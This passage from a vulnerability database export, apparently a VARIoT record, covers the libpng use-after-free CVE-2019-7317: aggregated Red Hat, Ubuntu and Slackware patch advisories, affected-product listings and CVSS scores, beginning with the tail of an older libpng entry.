"id": "CVE-2010-2249",
"ident": null
},
{
"date": "2015-04-13T21:46:00",
"db": "BID",
"id": "41174",
"ident": null
},
{
"date": "2023-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201006-491",
"ident": null
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-001805",
"ident": null
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2010-2249",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "libpng include pngrutil.c Memory leak vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
}
],
"trust": 0.6
}
}
VAR-201902-0855
Vulnerability from variot - Updated: 2026-03-09 23:19png_image_free in png.c in libpng 1.6.x before 1.6.37 has a use-after-free because png_image_free_function is called under png_safe_execute. libpng Exists in a vulnerability related to the use of freed memory.Service operation interruption (DoS) It may be in a state. libpng is prone to a denial-of-service vulnerability. An attacker may exploit this issue to crash the affected application, resulting in a denial-of-service condition. libpng version 1.6.36 is vulnerable; other versions may also be affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: thunderbird security update Advisory ID: RHSA-2019:1309-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:1309 Issue date: 2019-06-03 CVE Names: CVE-2018-18511 CVE-2019-5798 CVE-2019-7317 CVE-2019-9797 CVE-2019-9800 CVE-2019-9817 CVE-2019-9819 CVE-2019-9820 CVE-2019-11691 CVE-2019-11692 CVE-2019-11693 CVE-2019-11698 =====================================================================
- Summary:
An update for thunderbird is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le
- Description:
Mozilla Thunderbird is a standalone mail and newsgroup client.
This update upgrades Thunderbird to version 60.7.0.
Security Fix(es):
-
Mozilla: Memory safety bugs fixed in Firefox 67 and Firefox ESR 60.7 (CVE-2019-9800)
-
Mozilla: Cross-origin theft of images with createImageBitmap (CVE-2019-9797)
-
Mozilla: Stealing of cross-domain images using canvas (CVE-2019-9817)
-
Mozilla: Compartment mismatch with fetch API (CVE-2019-9819)
-
Mozilla: Use-after-free of ChromeEventHandler by DocShell (CVE-2019-9820)
-
Mozilla: Use-after-free in XMLHttpRequest (CVE-2019-11691)
-
Mozilla: Use-after-free removing listeners in the event listener manager (CVE-2019-11692)
-
Mozilla: Buffer overflow in WebGL bufferdata on Linux (CVE-2019-11693)
-
mozilla: Cross-origin theft of images with ImageBitmapRenderingContext (CVE-2018-18511)
-
chromium-browser: Out of bounds read in Skia (CVE-2019-5798)
-
Mozilla: Theft of user history data through drag and drop of hyperlinks to and from bookmarks (CVE-2019-11698)
-
libpng: use-after-free in png_image_free in png.c (CVE-2019-7317)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
All running instances of Thunderbird must be restarted for the update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1672409 - CVE-2019-7317 libpng: use-after-free in png_image_free in png.c 1676997 - CVE-2018-18511 mozilla: Cross-origin theft of images with ImageBitmapRenderingContext 1688200 - CVE-2019-5798 chromium-browser: Out of bounds read in Skia 1712617 - CVE-2019-11691 Mozilla: Use-after-free in XMLHttpRequest 1712618 - CVE-2019-11692 Mozilla: Use-after-free removing listeners in the event listener manager 1712619 - CVE-2019-11693 Mozilla: Buffer overflow in WebGL bufferdata on Linux 1712621 - CVE-2019-11698 Mozilla: Theft of user history data through drag and drop of hyperlinks to and from bookmarks 1712622 - CVE-2019-9797 Mozilla: Cross-origin theft of images with createImageBitmap 1712623 - CVE-2019-9800 Mozilla: Memory safety bugs fixed in Firefox 67 and Firefox ESR 60.7 1712626 - CVE-2019-9817 Mozilla: Stealing of cross-domain images using canvas 1712628 - CVE-2019-9819 Mozilla: Compartment mismatch with fetch API 1712629 - CVE-2019-9820 Mozilla: Use-after-free of ChromeEventHandler by DocShell
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: thunderbird-60.7.0-1.el7_6.src.rpm
x86_64: thunderbird-60.7.0-1.el7_6.x86_64.rpm thunderbird-debuginfo-60.7.0-1.el7_6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
Source: thunderbird-60.7.0-1.el7_6.src.rpm
ppc64le: thunderbird-60.7.0-1.el7_6.ppc64le.rpm thunderbird-debuginfo-60.7.0-1.el7_6.ppc64le.rpm
x86_64: thunderbird-60.7.0-1.el7_6.x86_64.rpm thunderbird-debuginfo-60.7.0-1.el7_6.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):
Source: thunderbird-60.7.0-1.el7_6.src.rpm
aarch64: thunderbird-60.7.0-1.el7_6.aarch64.rpm thunderbird-debuginfo-60.7.0-1.el7_6.aarch64.rpm
ppc64le: thunderbird-60.7.0-1.el7_6.ppc64le.rpm thunderbird-debuginfo-60.7.0-1.el7_6.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: thunderbird-60.7.0-1.el7_6.src.rpm
x86_64: thunderbird-60.7.0-1.el7_6.x86_64.rpm thunderbird-debuginfo-60.7.0-1.el7_6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-18511 https://access.redhat.com/security/cve/CVE-2019-5798 https://access.redhat.com/security/cve/CVE-2019-7317 https://access.redhat.com/security/cve/CVE-2019-9797 https://access.redhat.com/security/cve/CVE-2019-9800 https://access.redhat.com/security/cve/CVE-2019-9817 https://access.redhat.com/security/cve/CVE-2019-9819 https://access.redhat.com/security/cve/CVE-2019-9820 https://access.redhat.com/security/cve/CVE-2019-11691 https://access.redhat.com/security/cve/CVE-2019-11692 https://access.redhat.com/security/cve/CVE-2019-11693 https://access.redhat.com/security/cve/CVE-2019-11698 https://access.redhat.com/security/updates/classification/#important https://www.mozilla.org/en-US/security/advisories/mfsa2019-15/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXPWIu9zjgjWX9erEAQg21w//Z7v1kJQho28efeI70LrXGp/n0Hlj5i2m JwhPrwWDnz5BH5WbYrPIch/2CTL7znXR6v5rjisXoFhtvoSme3LPStyijp+bMXGr FtKnWFJRVt87gWZ8NwvY/mtwCjpIXSOCkAdEe6Rk+crG4gtBRct32ZDfcH+6U1Km cPpoguI0Q4cd/KZ4yiyFgUG66k0vBZ/mqUch480+vtlNkiO5JhZzPapTMEr5C9Ay qKmn6A98z3eVOpligYZ/5nAC4HfY6AhQp4CWFPijmvobJzq1a9z0XH4L9KeQk6RA laW0+rzw9NcsSk4c5WMWlcl9YzzYSr663av26VIKwgUnMEGjmBKstSUfgYIBgu3j ROMrVlHl2BTPJNrGtW0arWLo2pC0qCKEwcMGo8aisyNBLMc9QXFP4CCjf6uVtpU7 VYfHz3bwfokj7R9dFDh3dDTmyrLeAWkoDckEmo59XEfXaA1u7E/QEAnxA4h9wCb3 TU1frVhktXSh4lPO5JYIE4cpT50MJEyt2FPsSfQaL+q2EUMNlxR5IckSDx+sFicn jSelaqnOEpJQSle2bLWAQmGgWeMMkyHbRReCjRMBYPt0F/qbFiKIvRJISEYlVb9L xpnYw8aTMn5OFxH2BCT/+mVniOhZYqPK8CfEF2dTKZ7hYtzammrzndSZf2ifG574 3/xegYaen8Q= =TKs0 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64
- ========================================================================== Ubuntu Security Notice USN-3991-2 June 06, 2019
firefox regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 19.04
- Ubuntu 18.10
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
Summary:
USN-3991-1 caused a regression in Firefox. The update caused a regression which resulted in issues when upgrading between Ubuntu releases. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Multiple security issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the browser UI, trick the user in to launching local executable binaries, obtain sensitive information, conduct cross-site scripting (XSS) attacks, or execute arbitrary code. (CVE-2019-11691, CVE-2019-11692, CVE-2019-11693, CVE-2019-11695, CVE-2019-11696, CVE-2019-11699, CVE-2019-11701, CVE-2019-7317, CVE-2019-9800, CVE-2019-9814, CVE-2019-9817, CVE-2019-9819, CVE-2019-9820, CVE-2019-9821)
It was discovered that pressing certain key combinations could bypass addon installation prompt delays. If a user opened a specially crafted website, an attacker could potentially exploit this to trick them in to installing a malicious extension. (CVE-2019-11697)
It was discovered that history data could be exposed via drag and drop of hyperlinks to and from bookmarks. If a user were tricked in to dragging a specially crafted hyperlink to the bookmark toolbar or sidebar, and subsequently back in to the web content area, an attacker could potentially exploit this to obtain sensitive information. (CVE-2019-11698)
A type confusion bug was discovered with object groups and UnboxedObjects. If a user were tricked in to opening a specially crafted website after enabling the UnboxedObjects feature, an attacker could potentially exploit this to bypass security checks. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. 7) - x86_64
- Description:
IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.
Security Fix(es):
-
IBM JDK: Out-of-bounds access in the String.getBytes method (CVE-2019-11772)
-
IBM JDK: Failure to privatize a value pulled out of the loop by versioning (CVE-2019-11775)
-
OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328) (CVE-2019-2762)
-
OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432) (CVE-2019-2769)
-
OpenJDK: Missing URL format validation (Networking, 8221518) (CVE-2019-2816)
-
OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381) (CVE-2019-2786)
-
libpng: use-after-free in png_image_free in png.c (CVE-2019-7317)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1672409 - CVE-2019-7317 libpng: use-after-free in png_image_free in png.c 1730056 - CVE-2019-2769 OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432) 1730099 - CVE-2019-2816 OpenJDK: Missing URL format validation (Networking, 8221518) 1730255 - CVE-2019-2786 OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381) 1730415 - CVE-2019-2762 OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328) 1738547 - CVE-2019-11772 IBM JDK: Out-of-bounds access in the String.getBytes method 1738549 - CVE-2019-11775 IBM JDK: Failure to privatize a value pulled out of the loop by versioning
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] libpng (SSA:2019-107-01)
New libpng packages are available for Slackware 14.2 and -current to fix security issues.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/libpng-1.6.37-i586-1_slack14.2.txz: Upgraded. Fixed a memory leak in the ARM NEON implementation of png_do_expand_palette. Fixed a memory leak in pngtest.c. Fixed two vulnerabilities (CVE-2018-14048, CVE-2018-14550) in contrib/pngminus; refactor. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14048 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14550 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7317 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libpng-1.6.37-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libpng-1.6.37-x86_64-1_slack14.2.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.6.37-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.6.37-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.2 package: 829f6c020ad10fe9b09e94bceb7fae26 libpng-1.6.37-i586-1_slack14.2.txz
Slackware x86_64 14.2 package: e141813a42551a3c31df15b8495dc1a3 libpng-1.6.37-x86_64-1_slack14.2.txz
Slackware -current package: 0f711d15bd85893a02f398b95b7d3f06 l/libpng-1.6.37-i586-1.txz
Slackware x86_64 -current package: d8bdd5c1a73fa487c5f1a1a4b3ec2f63 l/libpng-1.6.37-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg libpng-1.6.37-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "package hub",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.04"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux for scientific computing",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "satellite",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "5.8"
},
{
"_id": null,
"model": "enterprise linux for power big endian",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux for scientific computing",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "hyperion infrastructure technology",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.6.0"
},
{
"_id": null,
"model": "xp7 command view advanced edition suite",
"scope": "lt",
"trust": 1.0,
"vendor": "hpe",
"version": "8.7.0-00"
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": "3.4.2"
},
{
"_id": null,
"model": "java se",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8u212"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "9.6"
},
{
"_id": null,
"model": "e-series santricity storage manager",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "11.53"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.37"
},
{
"_id": null,
"model": "e-series santricity management",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for power big endian",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "steelstore",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "7.3.9"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.1"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "42.3"
},
{
"_id": null,
"model": "enterprise linux for power little endian",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": "9.6"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "5.1"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.3"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": null
},
{
"_id": null,
"model": "e-series santricity web services",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "snapmanager",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "3.4.2"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "e-series santricity unified manager",
"scope": "lt",
"trust": 1.0,
"vendor": "netapp",
"version": "3.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.10"
},
{
"_id": null,
"model": "java se",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7u221"
},
{
"_id": null,
"model": "enterprise linux for ibm z systems",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "plug-in for symantec netbackup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "xp7 command view",
"scope": "lt",
"trust": 1.0,
"vendor": "hp",
"version": "8.7.0-00"
},
{
"_id": null,
"model": "enterprise linux for power little endian",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "ucosminexus client",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus service platform",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi application server",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "\u65e5\u7acb\u30a2\u30c9\u30d0\u30f3\u30b9\u30c8\u30b5\u30fc\u30d0 ha8000v \u30b7\u30ea\u30fc\u30ba",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi infrastructure analytics advisor",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi developer\u0027s kit for java",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus service architect",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi configuration manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi replication manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi global link manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi tiered storage manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi dynamic link manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi compute systems manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "cosminexus developer\u0027s kit for java",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi tuning manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": null,
"trust": 0.8,
"vendor": "png group",
"version": null
},
{
"_id": null,
"model": "hitachi device manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "hitachi automation director",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.36"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.37"
}
],
"sources": [
{
"db": "BID",
"id": "108098"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
},
{
"db": "NVD",
"id": "CVE-2019-7317"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu,Debian,Slackware Security Team",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-012"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7317",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 4.9,
"id": "CVE-2019-7317",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.9,
"vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.6,
"id": "CVE-2019-7317",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7317",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7317",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-7317",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-012",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7317",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7317"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-012"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
},
{
"db": "NVD",
"id": "CVE-2019-7317"
}
]
},
"description": {
"_id": null,
"data": "png_image_free in png.c in libpng 1.6.x before 1.6.37 has a use-after-free because png_image_free_function is called under png_safe_execute. libpng Exists in a vulnerability related to the use of freed memory.Service operation interruption (DoS) It may be in a state. libpng is prone to a denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the affected application, resulting in a denial-of-service condition. \nlibpng version 1.6.36 is vulnerable; other versions may also be affected. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: thunderbird security update\nAdvisory ID: RHSA-2019:1309-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:1309\nIssue date: 2019-06-03\nCVE Names: CVE-2018-18511 CVE-2019-5798 CVE-2019-7317 \n CVE-2019-9797 CVE-2019-9800 CVE-2019-9817 \n CVE-2019-9819 CVE-2019-9820 CVE-2019-11691 \n CVE-2019-11692 CVE-2019-11693 CVE-2019-11698 \n=====================================================================\n\n1. Summary:\n\nAn update for thunderbird is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le\n\n3. Description:\n\nMozilla Thunderbird is a standalone mail and newsgroup client. \n\nThis update upgrades Thunderbird to version 60.7.0. \n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 67 and Firefox ESR 60.7\n(CVE-2019-9800)\n\n* Mozilla: Cross-origin theft of images with createImageBitmap\n(CVE-2019-9797)\n\n* Mozilla: Stealing of cross-domain images using canvas (CVE-2019-9817)\n\n* Mozilla: Compartment mismatch with fetch API (CVE-2019-9819)\n\n* Mozilla: Use-after-free of ChromeEventHandler by DocShell (CVE-2019-9820)\n\n* Mozilla: Use-after-free in XMLHttpRequest (CVE-2019-11691)\n\n* Mozilla: Use-after-free removing listeners in the event listener manager\n(CVE-2019-11692)\n\n* Mozilla: Buffer overflow in WebGL bufferdata on Linux (CVE-2019-11693)\n\n* mozilla: Cross-origin theft of images with ImageBitmapRenderingContext\n(CVE-2018-18511)\n\n* chromium-browser: Out of bounds read in Skia (CVE-2019-5798)\n\n* Mozilla: Theft of user history data through drag and drop of hyperlinks\nto and from bookmarks (CVE-2019-11698)\n\n* libpng: use-after-free in png_image_free in png.c (CVE-2019-7317)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAll running instances of Thunderbird must be restarted for the update to\ntake effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1672409 - CVE-2019-7317 libpng: use-after-free in png_image_free in png.c\n1676997 - CVE-2018-18511 mozilla: 